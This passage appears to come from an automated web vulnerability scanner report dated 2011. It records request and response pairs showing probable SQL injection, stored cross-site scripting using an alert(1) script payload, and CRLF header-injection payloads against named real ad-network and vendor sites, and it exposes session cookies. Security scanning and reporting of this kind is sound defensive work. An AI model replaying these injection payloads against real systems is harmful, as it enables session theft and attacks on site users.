<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3''&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3841
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600'&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:43 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600''&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:23:44 GMT
Server: cafe
Cache-Control: private
Content-Length: 3757
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

2. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 4d781</script><script>alert(1)</script>9d640d4f59f was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache-Coyote/1.1
Content-Length: 12410


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp4d781</script><script>alert(1)</script>9d640d4f59f?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo
...[SNIP]...

2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The value of REST URL parameter 2 submitted to the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp. The payload 31393</script>041f4ab8ff6 was submitted in the REST URL parameter 2. This input was returned unmodified in a subsequent request for the URL /pogo-online-games/lp-GeneralPogo-withoutFB.jsp.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12389


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
}
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp31393</script>041f4ab8ff6?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&kw=free%20internet%20games&ad=6429295350&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="
...[SNIP]...

3. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94d4d%0d%0ad5e6278b016 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif94d4d%0d%0ad5e6278b016?0.18809315958060324 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif94d4d
d5e6278b016
:
Date: Fri, 24 Jun 2011 13:32:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 440f8%0d%0afd67be24785 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/440f8%0d%0afd67be24785/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM?pv=26143364701.420067&cookie=ABL75QCUY5EGNEJJXWHGIG%3A1%7C36AMQQX26NAKPETSLKXA3W%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A2&width=468&height=60&x=0&y=0&keyw=&cpm=g)))TgSPJQAHQHIK5XdUBd5fQRecsO_YZwjowKwVMA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=60&slotname=2204023174&w=468&lmt=1308927567&flash=10.3.181&url=http%3A%2F%2Fphuket.com%2F&dt=1308921637628&bpp=5&shv=r20110615&jsv=r20110616&correlator=1308921637930&frm=4&adk=1151138738&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=791522303&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=36813006&fu=0&ifi=1&dtd=426&xpc=k1mQeRIDm4&p=http%3A//phuket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:24:15 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/440f8
fd67be24785
/Y2YJ7A74HNGIZPY5GRC64S/aa124d880659045d2ecfa27a65500c85.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://sales.swsoft.com/buyonline/ [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the key request parameter is copied into the location response header. The payload cde47%0d%0a51dddc47dfc was submitted in the key parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=cde47%0d%0a51dddc47dfc HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=cde47
51dddc47dfc

Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the location response header. The payload 63065%0d%0a38879286b1d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000&63065%0d%0a38879286b1d=1 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000&63065
38879286b1d
=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.5. http://sales.swsoft.com/buyonline/ [os parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the os request parameter is copied into the location response header. The payload c2c42%0d%0ade299d446bb was submitted in the os parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=c2c42%0d%0ade299d446bb&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/addons/?store_id=1&version=10.0.0&os=c2c42
de299d446bb
&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the store_id request parameter is copied into the location response header. The payload 71e53%0d%0a84c3c05dd74 was submitted in the store_id parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=71e53%0d%0a84c3c05dd74&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=71e53
84c3c05dd74
&version=10.0.0&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


3.7. http://sales.swsoft.com/buyonline/ [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The value of the version request parameter is copied into the location response header. The payload 454ba%0d%0a35cbc67735f was submitted in the version parameter. This caused a response containing an injected HTTP header.

Request

GET /buyonline/?target=addons&store_id=1&version=454ba%0d%0a35cbc67735f&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
